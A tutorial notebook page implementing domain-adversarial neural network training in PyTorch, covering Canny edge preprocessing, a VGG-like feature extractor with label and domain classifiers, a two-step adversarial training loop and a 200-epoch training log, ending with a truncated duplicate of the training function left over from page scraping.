Simply put, when a pixel's edge response exceeds high_threshold, we mark it as an edge. If it only exceeds low_threshold, it is kept as an edge only if it connects to a pixel already marked as an edge (hysteresis).
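
As a toy illustration of the double-threshold rule (a minimal sketch with made-up gradient magnitudes; the real cv2.Canny also computes image gradients, applies non-maximum suppression, and links weak edges to strong ones by connectivity):

import numpy as np

# Hypothetical gradient magnitudes for a 3x3 patch (made up for illustration).
grad = np.array([[ 30,  80, 160],
                 [ 10, 120, 200],
                 [  5,  40,  90]])
low_threshold, high_threshold = 50, 100

strong = grad > high_threshold            # definitely edges
weak = (grad > low_threshold) & ~strong   # edges only if connected to a strong edge
print(strong)
print(weak)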

Let's apply it to the source data.

import cv2
import matplotlib.pyplot as plt
titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
plt.figure(figsize=(18, 18))

original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
plt.subplot(1, 5, 1)
no_axis_show(original_img, title='original')

gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
plt.subplot(1, 5, 2)
no_axis_show(gray_img, title='gray scale', cmap='gray')

canny_50100 = cv2.Canny(gray_img, 50, 100)
plt.subplot(1, 5, 3)
no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

canny_150200 = cv2.Canny(gray_img, 150, 200)
plt.subplot(1, 5, 4)
no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

canny_250300 = cv2.Canny(gray_img, 250, 300)
plt.subplot(1, 5, 5)
no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

                        png

Data Processing

The data is laid out in the format expected by torchvision.ImageFolder, so you can use torchvision.ImageFolder to create the datasets. For details of the image augmentation, see the comments in the code below.

import numpy as np
import torch                                     # tensor operations
import torch.nn as nn                            # neural network layers
import torch.nn.functional as F
from torch.autograd import Function              # custom autograd functions

import torch.optim as optim                      # optimizers
import torchvision.transforms as transforms
from torchvision.datasets import ImageFolder
from torch.utils.data import DataLoader

# source_transform applies Canny edge detection, then some augmentation (flips and rotations).
source_transform = transforms.Compose([
    # Turn RGB to grayscale. (Because Canny does not support RGB images.)
    transforms.Grayscale(),
    # cv2 does not accept PIL Images, so we convert to np.array
    # and then apply the cv2.Canny algorithm.
    transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)),
    # Transform the np.array back to a PIL Image.
    transforms.ToPILImage(),
    # 50% horizontal flip (augmentation).
    transforms.RandomHorizontalFlip(),
    # Rotate +-15 degrees (augmentation); empty pixels after rotation are filled with zero.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
])

# target_transform skips edge detection and instead resizes the images
# (from 28x28 to 32x32) so that they match the source data.
target_transform = transforms.Compose([
    # Turn RGB to grayscale.
    transforms.Grayscale(),
    # Resize: the source data is 32x32, so we enlarge the target data from 28x28 to 32x32.
    transforms.Resize((32, 32)),
    # 50% horizontal flip (augmentation).
    transforms.RandomHorizontalFlip(),
    # Rotate +-15 degrees (augmentation); empty pixels after rotation are filled with zero.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
])

# ImageFolder loads the images from the given paths and applies source_transform / target_transform.
source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

# The DataLoaders feed the data to the model in batches.
# batch_size=32 means 32 images per batch; shuffle=True randomizes the training order,
# which helps reduce overfitting. test_dataloader keeps the test order fixed (shuffle=False).
source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)
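
As a quick check of the pipeline (a minimal sketch, assuming the dataset has been downloaded and the cells above have run; the index 0 is arbitrary):

# Peek at one transformed source sample: a 1x32x32 float tensor in [0, 1] plus its class index.
img, label = source_dataset[0]
print(img.shape, label)   # expected: torch.Size([1, 32, 32]) 0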

Model

Feature Extractor: a classic VGG-like architecture.

Label Predictor / Domain Classifier: linear models.

class FeatureExtractor(nn.Module):

    def __init__(self):
        super(FeatureExtractor, self).__init__()

        # FeatureExtractor is a CNN that extracts high-dimensional features from the
        # input image. It consists of 5 convolutional blocks, each containing:
        self.conv = nn.Sequential(
            nn.Conv2d(1, 64, 3, 1, 1),    # a convolution (Conv2d) extracting spatial features;
            nn.BatchNorm2d(64),           # batch normalization (BatchNorm2d) stabilizing training;
            nn.ReLU(),                    # a ReLU activation providing non-linearity;
            nn.MaxPool2d(2),              # max pooling (MaxPool2d) downsampling the feature maps.

            nn.Conv2d(64, 128, 3, 1, 1),
            nn.BatchNorm2d(128),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(128, 256, 3, 1, 1),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(256, 256, 3, 1, 1),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(256, 512, 3, 1, 1),
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(2)
        )

    def forward(self, x):
        x = self.conv(x).squeeze()
        return x

class LabelPredictor(nn.Module):

    def __init__(self):
        super(LabelPredictor, self).__init__()

        self.layer = nn.Sequential(
            nn.Linear(512, 512),    # the first two layers are 512-in / 512-out fully connected layers, each followed by ReLU;
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.ReLU(),

            nn.Linear(512, 10),     # the final layer outputs 10 values, one per class.
        )

    def forward(self, h):
        c = self.layer(h)
        return c

class DomainClassifier(nn.Module):

    def __init__(self):
        super(DomainClassifier, self).__init__()

        self.layer = nn.Sequential(
            nn.Linear(512, 512),    # each hidden layer is followed by batch normalization (BatchNorm1d) and ReLU.
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 1),      # the final layer is a single output neuron (Linear(512, 1)) predicting the domain label.
        )

    def forward(self, h):
        y = self.layer(h)
        return y
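
As a quick sanity check (a minimal sketch, assuming the classes above are defined): a 32x32 input is halved by five stride-2 max pools, 32 -> 16 -> 8 -> 4 -> 2 -> 1, so the extractor ends with a 512x1x1 map that .squeeze() flattens into the 512-d vector the linear heads expect.

import torch

x = torch.randn(8, 1, 32, 32)          # a dummy batch of 8 grayscale 32x32 images
feat = FeatureExtractor()(x)           # five stride-2 pools: 32 -> 16 -> ... -> 1
print(feat.shape)                      # torch.Size([8, 512])
print(LabelPredictor()(feat).shape)    # torch.Size([8, 10])
print(DomainClassifier()(feat).shape)  # torch.Size([8, 1])
# Note: for a batch of size 1, .squeeze() would also drop the batch dimension.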

Pre-processing

Here, we use Adam as our optimizer.

# Initialize the models and move them to the GPU.
feature_extractor = FeatureExtractor().cuda()
label_predictor = LabelPredictor().cuda()
domain_classifier = DomainClassifier().cuda()

# Define the loss functions.
# Cross-entropy loss for the classification task, computed between the LabelPredictor's
# predicted class distribution and the true labels.
class_criterion = nn.CrossEntropyLoss()
# Binary cross-entropy with logits (the sigmoid is applied internally) for the binary task
# of deciding which domain (data distribution) a sample comes from; used by the DomainClassifier.
domain_criterion = nn.BCEWithLogitsLoss()

# Each module gets its own Adam optimizer (optim.Adam), which handles the large number of
# parameters and noisy gradients of deep models well.
optimizer_F = optim.Adam(feature_extractor.parameters())
optimizer_C = optim.Adam(label_predictor.parameters())
optimizer_D = optim.Adam(domain_classifier.parameters())

Start Training

DaNN Implementation

In the original paper, a Gradient Reversal Layer is used, and the Feature Extractor, Label Predictor, and Domain Classifier are all trained simultaneously. In this code, we instead train the Domain Classifier first and then the Feature Extractor, the same idea as the alternating training of the Generator and Discriminator in a GAN (a sketch of the Gradient Reversal Layer follows the notes below).

• The lambda that weights the domain-adversarial loss is adaptive in the original paper; see the paper for details. Here lambda is fixed at 0.1.
• We have no labels for the target data, so you can only evaluate your model by uploading its predictions to Kaggle :)
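
For reference, here is a minimal sketch of how the Gradient Reversal Layer mentioned above is commonly written in PyTorch (an illustrative assumption, not part of this homework's code; the training code below does not use it):

from torch.autograd import Function

class GradReverse(Function):
    # Identity in the forward pass; multiplies the gradient by -lamb in the backward pass,
    # so the feature extractor is pushed to maximize the domain classifier's loss.
    @staticmethod
    def forward(ctx, x, lamb):
        ctx.lamb = lamb
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        return grad_output.neg() * ctx.lamb, None

def grad_reverse(x, lamb=1.0):
    return GradReverse.apply(x, lamb)

# With a GRL, one would feed grad_reverse(feature, lamb) into the domain classifier and
# optimize a single combined loss, instead of the two-step scheme used here.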
def train_epoch(source_dataloader, target_dataloader, lamb):
    '''
    Args:
        source_dataloader: dataloader of the source data
        target_dataloader: dataloader of the target data
        lamb: controls the balance between domain adaptation and classification
    '''

    # D loss: the Domain Classifier's loss.
    # F loss: the Feature Extractor & Label Predictor's loss.
    # running_D_loss accumulates the domain classifier's loss;
    # running_F_loss accumulates the feature extractor's and label predictor's loss;
    running_D_loss, running_F_loss = 0.0, 0.0
    # total_hit and total_num track the classification accuracy on the source domain.
    total_hit, total_num = 0.0, 0.0

    # Iterate over source- and target-domain batches in lockstep: source_data and source_label
    # are the source images and labels, target_data are the target images.
    for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
        source_data = source_data.cuda()
        source_label = source_label.cuda()
        target_data = target_data.cuda()

        # Mix the source data and target data; otherwise the running statistics of
        # batch_norm would be misled (running mean/var of source and target data differ).
        mixed_data = torch.cat([source_data, target_data], dim=0)
        domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
        # Set the domain label of the source data to 1.
        domain_label[:source_data.shape[0]] = 1

        # Step 1: train the domain classifier.
        # Extract features of the mixed data; we don't train the feature extractor in this
        # step, so feature.detach() stops gradients from flowing back into it.
        feature = feature_extractor(mixed_data)
        domain_logits = domain_classifier(feature.detach())
        # Compute the domain classification loss from domain_label and the predicted domain_logits.
        loss = domain_criterion(domain_logits, domain_label)
        running_D_loss += loss.item()
        loss.backward()
        optimizer_D.step()

        # Step 2: train the feature extractor and label predictor.
        # class_logits are the label predictor's outputs for the source domain;
        # domain_logits are used for domain classification.
        class_logits = label_predictor(feature[:source_data.shape[0]])
        domain_logits = domain_classifier(feature)
        # loss = classification cross-entropy - lamb * domain binary cross-entropy.
        # The subtraction plays the same role as the generator loss against the discriminator
        # in a GAN: the extractor learns features the domain classifier cannot separate.
        loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
        running_F_loss += loss.item()
        loss.backward()
        # Update feature_extractor and label_predictor, then zero all gradients
        # and accumulate the source-domain classification accuracy.
        optimizer_F.step()
        optimizer_C.step()

        optimizer_D.zero_grad()
        optimizer_F.zero_grad()
        optimizer_C.zero_grad()

        total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
        total_num += source_data.shape[0]
        print(i, end='\r')

    return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

# Train for 200 epochs; after each epoch, save the model weights and print the training losses and accuracy.
for epoch in range(200):

    train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

    torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
    torch.save(label_predictor.state_dict(), f'predictor_model.bin')

    print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
                      epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
                      epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
                      epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
                      epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
                      epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
                      epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
                      epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
                      epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
                      epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
                      epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
                      epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
                      epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
                      epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
                      epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
                      epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
                      epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
                      epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
                      epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
                      epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
                      epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
                      epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
                      epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
                      epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
                      epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
                      epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
                      epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
                      epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
                      epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
                      epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
                      epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
                      epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
                      epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
                      epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
                      epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
                      epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
                      epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
                      epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
                      epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
                      epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
                      epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
                      epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
                      epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
                      epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
                      epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
                      epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
                      epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
                      epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
                      epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
                      epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
                      epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
                      epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
                      epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
                      epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
                      epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
                      epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
                      epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
                      epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
                      epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
                      epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
                      epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
                      epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
                      epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
                      epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
                      epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
                      epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
                      epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
                      epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
                      epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
                      epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
                      epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
                      epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
                      epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
                      epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
                      epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
                      epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
                      epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
                      epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
                      epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
                      epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
                      epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
                      epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
                      epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
                      epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
                      epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
                      epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
                      epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
                      epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
                      epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
                      epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
                      epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
                      epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
                      epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
                      epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
                      epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
                      epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
                      epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
                      epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
                      epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
                      epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
                      epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
                      epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
                      epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
                      epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
                      epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
                      epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
                      epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
                      epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
                      epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
                      epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
                      epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
                      epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
                      epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
                      epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
                      epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
                      epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
                      epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
                      epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
                      epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
                      epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
                      epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
                      epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
                      epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
                      epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
                      epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
                      epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
                      epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
                      epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
                      epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
                      epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
                      epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
                      epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
                      epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
                      epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
                      epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
                      epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
                      epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
                      epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
                      epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
                      epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
                      epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
                      epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
                      epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
                      epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
                      epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
                      epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
                      epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
                      epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
                      epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
                      epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
                      epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
                      epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
                      epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
                      epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
                      epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
                      epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
                      epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
                      epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
                      epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
                      epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
                      epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
                      epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
                      epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
                      epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
                      epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
                      epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
                      epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
                      epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
                      epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
                      epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
                      epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
                      epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
                      epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
                      epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
                      epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
                      epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
                      epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
                      epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
                      epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
                      epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
                      epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
                      epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
                      epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
                      epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
                      epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
                      epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
                      epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
                      epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
                      epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
                      epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
                      epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
                      epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
                      epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
                      epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
                      epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
                      epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
                      epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      def train_epoch(source_dataloader, target_dataloader, lamb):
                      '''
                      Args:
                      source_dataloader: source data 的 dataloader
                      target_dataloader: target data 的 dataloader
                      lamb: control the balance of domain adaptatoin and classification. 控制域适配与分类之间的平衡
                      '''

# D loss: Domain Classifier's loss
# F loss: Feature Extractor & Label Predictor's loss
# running_D_loss accumulates the domain classifier's loss;
# running_F_loss accumulates the feature extractor / label predictor's loss.
running_D_loss, running_F_loss = 0.0, 0.0
# total_hit and total_num track the source-domain classification accuracy.
total_hit, total_num = 0.0, 0.0

for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
    # Iterate over source- and target-domain batches in lockstep: source_data and
    # source_label are source-domain images and labels; target_data are target-domain images.
    source_data = source_data.cuda()
    source_label = source_label.cuda()
    target_data = target_data.cuda()

    # Mix the source data and target data, or it'll mislead the running params
    # of batch_norm (running mean/var of source and target data are different).
    mixed_data = torch.cat([source_data, target_data], dim=0)
    domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
    # Set the domain label of the source data to 1.
    domain_label[:source_data.shape[0]] = 1

    # Step 1: train the domain classifier.
    # Extract features of the mixed batch; feature.detach() below keeps gradients
    # from flowing back into feature_extractor.
    feature = feature_extractor(mixed_data)
    # We don't need to train the feature extractor in step 1,
    # thus we detach the features to avoid backpropagation into it.
    domain_logits = domain_classifier(feature.detach())
    # Domain-classification loss between the predicted domain_logits and domain_label.
    loss = domain_criterion(domain_logits, domain_label)
    running_D_loss += loss.item()
    loss.backward()
    optimizer_D.step()

    # Step 2: train the feature extractor and the label classifier.
    # class_logits is the label predictor's output on the source-domain half.
    class_logits = label_predictor(feature[:source_data.shape[0]])
    # domain_logits is used for domain classification.
    domain_logits = domain_classifier(feature)
    # loss = classification cross entropy - lamb * domain binary cross entropy.
    # The subtraction plays the same role as the generator loss against the
    # discriminator in a GAN: the source classification loss
    # class_criterion(class_logits, source_label) and the domain loss
    # domain_criterion(domain_logits, domain_label) pull in opposite
    # directions, giving an adversarial objective.
    loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
    running_F_loss += loss.item()
    loss.backward()
    # Update feature_extractor and label_predictor, then zero all gradients
    # and accumulate the source-domain accuracy.
    optimizer_F.step()
